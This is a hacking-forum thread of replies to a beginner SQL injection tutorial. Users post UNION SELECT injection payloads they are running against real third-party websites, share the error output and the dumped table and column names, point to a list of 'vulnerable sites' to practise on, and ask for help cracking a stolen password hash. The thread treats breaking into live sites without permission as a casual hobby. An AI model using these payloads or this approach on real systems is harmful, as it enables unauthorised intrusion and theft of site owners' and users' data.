SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D

ty man...im really new at this stuff..only know few thinks...more tuts like this! ! :smile:

edit:i tried a lot of this Dorks i even use Exploit Scaner and i can't find any vulnerable web site....pls help me

Nice short Tut saves time ^_^.

(07-03-2011, 12:20 AM)∑√ıŁ Wrote:

[To see links please register here]

Nice short Tut saves time ^_^.

Thanks! Glad you like it.

(06-30-2011, 07:34 PM)xxl00pb4ckxx Wrote:

[To see links please register here]

Hey I'm getting the hang of it, but no luck yet...

When I get to replacing @@version with concat(database()) to pull the db name I get this error on every site:

Here's an example:

[To see links please register here]

--

works fine, outputs: 5.1.56

ok so I replace @@version and now the url looks like:

[To see links please register here]

union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--

the url look mangled in the input box:

[To see links please register here]

now

and I get this error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database ,3,4,5,6,7,8,9,10,11,12- AND PostType = 2 LIMIT 13' at line 1

help? getting the same thing on like 5 vuln sites in a row :sad:

this is my style bro....

[To see links please register here]

union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--

[To see links please register here]

--

FOUnd:FORUM,FORUM_COMMENTS,OBITUARIES,POST

[To see links please register here]

--

Found:ID,Title,Date,Post,VISIBLE,ID,Forum_ID,Name,Email,Location,Comment,Date,Visible,ID,Title,obituary,Image,IsVisible,ID,Title,Tagline,Author,DatePosted,Post,Image,Caption,ImageAuthor,PostType,FrontPage,IsPublish

it can't find admin table... so i just want to show you example to find user+pass from admin table..
this:

[To see links please register here]

--

but it still not found another data ,because the table/column in database is none...

i'm so sorry before my english is sucks ...
^_^' :epic:

man that shit was great but i am wondering why no one has any tuts about grabbing all data i want to make one can you collaborate with me and well post it together good fucking work id like to have a discussion with you you seem smart and i could use some new understanding un this fucking mysql4 with no schema lol

(08-02-2011, 11:27 PM)sec0verun Wrote:

[To see links please register here]

man that shit was great but i am wondering why no one has any tuts about grabbing all data i want to make one can you collaborate with me and well post it together good fucking work id like to have a discussion with you you seem smart and i could use some new understanding un this fucking mysql4 with no schema lol

Hacking websites with mysql 4 or lower is hard as fuck and takes forever even with tools. I don't recommend doing it.

And if you're looking for fresh sites to practice on, look at my list of vulnerable sites. Just follow the tutorial, some sites might not work btw.

I love hackng.But i dont have computer to do this

(08-06-2011, 02:15 PM)HackThenNom Wrote:

[To see links please register here]

I must be a mega noob, you lsot me when we were adding stuff to the end of the URL. the site i want to hack is

[To see links please register here]

It isn't vulnerable to SQLi. You can't inject into it.

well your tutorial was very good and i kinda got it full but then i came up with this hash i cant decyrpt it haviji failed it too


3ad123c36286fddbf0a080a26c556741,6

nice tut bro. . . easy to understand too...